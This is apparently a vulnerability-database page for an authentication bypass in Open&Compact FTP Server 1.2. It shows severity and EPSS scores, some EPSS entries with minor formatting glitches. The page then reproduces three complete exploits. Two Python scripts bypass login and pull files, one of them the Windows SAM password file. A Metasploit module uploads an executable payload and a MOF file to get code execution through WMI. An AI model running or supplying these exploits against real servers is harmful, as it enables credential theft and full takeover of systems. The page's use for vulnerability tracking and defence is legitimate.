CPE, which stands for Common Platform Enumeration, is a standardized scheme for naming hardware, software, and operating systems. CPE provides a structured naming scheme to uniquely identify and classify information technology systems, platforms, and packages based on certain attributes such as vendor, product name, version, update, edition, and language.
CWE, or Common Weakness Enumeration, is a comprehensive list and categorization of software weaknesses and vulnerabilities. It serves as a common language for describing software security weaknesses in architecture, design, code, or implementation that can lead to vulnerabilities.
CAPEC, which stands for Common Attack Pattern Enumeration and Classification, is a comprehensive, publicly available resource that documents common patterns of attack employed by adversaries in cyber attacks. This knowledge base aims to understand and articulate common vulnerabilities and the methods attackers use to exploit them.
Services & Price
Help & Info
Search : CVE id, CWE id, CAPEC id, vendor or keywords in CVE
Open&Compact FTP Server (Open-FTPD) 1.2 and earlier allows remote attackers to bypass authentication by sending (1) LIST, (2) RETR, (3) STOR, or other commands without performing the required login steps first.
Improper Authentication When an actor claims to have a given identity, the product does not prove or insufficiently proves that the claim is correct.
Metrics
Metrics
Score
Severity
CVSS Vector
Source
V2
9.3
AV:N/AC:M/Au:N/C:C/I:C/A:C
nvd@nist.gov
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
Date
EPSS V0
EPSS V1
EPSS V2 (> 2022-02-04)
EPSS V3 (> 2025-03-07)
EPSS V4 (> 2025-03-17)
2022-02-06
–
–
71.79%
–
–
2023-03-12
–
–
–
51.33%
–
2023-07-23
–
–
–
48.09%
–
2023-09-03
–
–
–
55.74%
–
2023-10-22
–
–
–
52.23%
–
2023-12-03
–
–
–
60.09%
–
2024-01-14
–
–
–
63.09%
–
2024-02-11
–
–
–
54.98%
–
2024-03-17
–
–
–
58.94%
–
2024-06-02
–
–
–
52.41%
–
2024-06-02
–
–
–
52.41%
–
2024-09-22
–
–
–
56.25%
–
2024-12-22
–
–
–
40.41%
–
2025-01-05
–
–
–
43.43%
–
2025-02-09
–
–
–
44.28%
–
2025-01-19
–
–
–
43.43%
–
2025-02-16
–
–
–
44.28%
–
2025-03-18
–
–
–
–
55.67%
2025-03-18
–
–
–
–
55.67,%
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
#!/usr/bin/python
# Exploit Title: Open&Compact Ftp Server <= 1.2 Auth bypass & directory traversal sam retrieval
# Date: Aug 7, 2013
# By Wireghoul - http://www.justanotherhacker.com
# Based on Serge Gorbunov's auth bypass (http://www.exploit-db.com/exploits/13932/)
# Software Link: http://sourceforge.net/projects/open-ftpd/
# Version: <= 1.2
# Tested on: Windows 7, Windows XP SP3
# Abusing authentication bypass in combination with a directory traversal to grab
# the sam file for offline cracking
import ftplib
import os
# Connect to server
ftp = ftplib.FTP( "192.168.58.135" )
ftp.set_pasv( False )
# Note that we need no authentication at all!!
print ftp.sendcmd( 'CWD C:\\\\windows\\\\repair\\\\' )
print ftp.retrbinary('RETR sam', open('sam', 'wb').write )
ftp.quit()
# Exploit Title: Open&Compact Ftp Server <= 1.2 Full System Access
# Date: June 12, 2010
# Author: Serge Gorbunov
# Software Link: http://sourceforge.net/projects/open-ftpd/
# Version: <= 1.2
# Tested on: Windows 7, Windows XP SP3
#!/usr/bin/python
# Simply by omitting login process to the open ftp server it is possible
# to execute any command, including but not limited to: listing files,
# retrieving files, storing files.
# Below is an example of a few commands.
# If you want to test storing files with no authentication, create a
# test file and uncomment out line with ftp.storbinary function call.
# Any command will work as long as there is at least on user who has the permission
# to execute that command. For example, storing files will work as long
# as there is one user with write permission. No matter whom it is.
import ftplib
import os
# Connect to server
ftp = ftplib.FTP( "127.0.0.1" )
ftp.set_pasv( False )
# Note that we need no authentication at all!!
print ftp.retrlines( 'LIST' )
print ftp.retrbinary('RETR changelog.txt', open('changelog.txt', 'wb').write )
# filename = 'test.txt'
# f = open( filename, 'rb' )
# print ftp.storbinary( 'STOR ' + filename, f )
# f.close()
ftp.quit()
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::Ftp
include Msf::Exploit::Remote::TcpServer
include Msf::Exploit::EXE
include Msf::Exploit::WbemExec
include Msf::Exploit::FileDropper
def initialize(info={})
super(update_info(info,
'Name' => "Open-FTPD 1.2 Arbitrary File Upload",
'Description' => %q{
This module exploits multiple vulnerabilities found in Open&Compact FTP
server. The software contains an authentication bypass vulnerability and a
arbitrary file upload vulnerability that allows a remote attacker to write
arbitrary files to the file system as long as there is at least one user
who has permission.
Code execution can be achieved by first uploading the payload to the remote
machine as an exe file, and then upload another mof file, which enables
WMI (Management Instrumentation service) to execute the uploaded payload.
Please note that this module currently only works for Windows before Vista.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Serge Gorbunov', # Initial discovery
'Brendan Coles <bcoles[at]gmail.com>', # Metasploit
],
'References' =>
[
['OSVDB', '65687'],
['EDB', '13932'],
['CVE', '2010-2620']
],
'Payload' =>
{
'BadChars' => "\x00",
},
'Platform' => 'win',
'Stance' => Msf::Exploit::Stance::Aggressive,
'Targets' =>
[
# Tested on version 1.2 - Windows XP SP3 (EN)
['Open&Compact FTP 1.2 on Windows (Before Vista)', {}]
],
'Privileged' => true,
'DisclosureDate' => "Jun 18 2012",
'DefaultTarget' => 0))
register_options([
OptString.new('PATH', [true, 'The local Windows path', "C:/WINDOWS/"]),
OptPort.new('SRVPORT', [true, 'The local port to listen on for active mode', 8080])
], self.class)
deregister_options('FTPUSER', 'FTPPASS') # Using authentication bypass
end
def check
connect
disconnect
if banner =~ /\*\* Welcome on \*\*/
return Exploit::CheckCode::Vulnerable
else
return Exploit::CheckCode::Unknown
end
end
def on_client_connect(cli)
peer = "#{cli.peerhost}:#{cli.peerport}"
case @stage
when :exe
print_status("#{peer} - Sending executable (#{@exe.length.to_s} bytes)")
cli.put(@exe)
@stage = :mof
when :mof
print_status("#{peer} - Sending MOF (#{@mof.length.to_s} bytes)")
cli.put(@mof)
end
cli.close
end
# Largely stolen from freefloatftp_wbem.rb
def upload(filename)
select(nil, nil, nil, 1)
peer = "#{rhost}:#{rport}"
print_status("#{peer} - Trying to upload #{::File.basename(filename)}")
conn = connect(false, datastore['VERBOSE'])
if not conn
fail_with(Exploit::Failure::Unreachable, "#{@peer} - Connection failed")
end
# Switch to binary mode
print_status("#{peer} - Set binary mode")
send_cmd(['TYPE', 'I'], true, conn)
# Prepare active mode: Get attacker's IP and source port
src_ip = datastore['SRVHOST'] == '0.0.0.0' ? Rex::Socket.source_address : datastore['SRVHOST']
src_port = datastore['SRVPORT'].to_i
# Prepare active mode: Convert the IP and port for active mode
src_ip = src_ip.gsub(/\./, ',')
src_port = "#{src_port/256},#{src_port.remainder(256)}"
# Set to active mode
print_status("#{peer} - Set active mode \"#{src_ip},#{src_port}\"")
send_cmd(['PORT', "#{src_ip},#{src_port}"], true, conn)
# Tell the FTP server to download our file
send_cmd(['STOR', filename], false, conn)
print_good("#{peer} - Upload successful")
disconnect(conn)
end
# Largely stolen from freefloatftp_wbem.rb
def exploit
path = datastore['PATH']
exe_name = "#{path}/system32/#{rand_text_alpha(rand(10)+5)}.exe"
mof_name = "#{path}/system32/wbem/mof/#{rand_text_alpha(rand(10)+5)}.mof"
@mof = generate_mof(::File.basename(mof_name), ::File.basename(exe_name))
@exe = generate_payload_exe
@stage = :exe
begin
t = framework.threads.spawn("reqs", false) {
# Upload our malicious executable
u = upload(exe_name)
# Upload the mof file
upload(mof_name) if u
register_file_for_cleanup("#{::File.basename(exe_name)}")
register_file_for_cleanup("wbem\\mof\\good\\#{::File.basename(mof_name)}")
}
super
ensure
t.kill
end
end
end
Products Mentioned
Configuraton 0
Open-ftpd>>Open-ftpd >> Version To (including) 1.2